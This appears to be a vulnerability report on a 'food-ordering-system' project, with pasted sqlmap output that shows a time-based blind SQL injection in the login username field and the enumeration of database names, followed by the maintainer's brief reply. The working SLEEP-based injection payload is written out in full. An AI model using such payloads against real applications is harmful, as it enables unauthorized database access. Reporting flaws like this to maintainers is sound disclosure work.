food-ordering-system
Blind SQLi on username parameter
sqlmap got a 302 redirect to 'http://192.168.1.64:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))KkoL)-- eriu&password=admin
[10:33:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:33:12] [INFO] fetching database names
[10:33:12] [INFO] fetching number of databases
[10:33:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:33:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:33:43] [INFO] adjusting time delay to 1 second due to good response times
6
[10:33:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information_schema
[10:35:44] [INFO] retrieved: food
OK, thanks for notifying. I will look into this later. Since this is not a production-ready app, you can expect such problems :) I will try to fix it.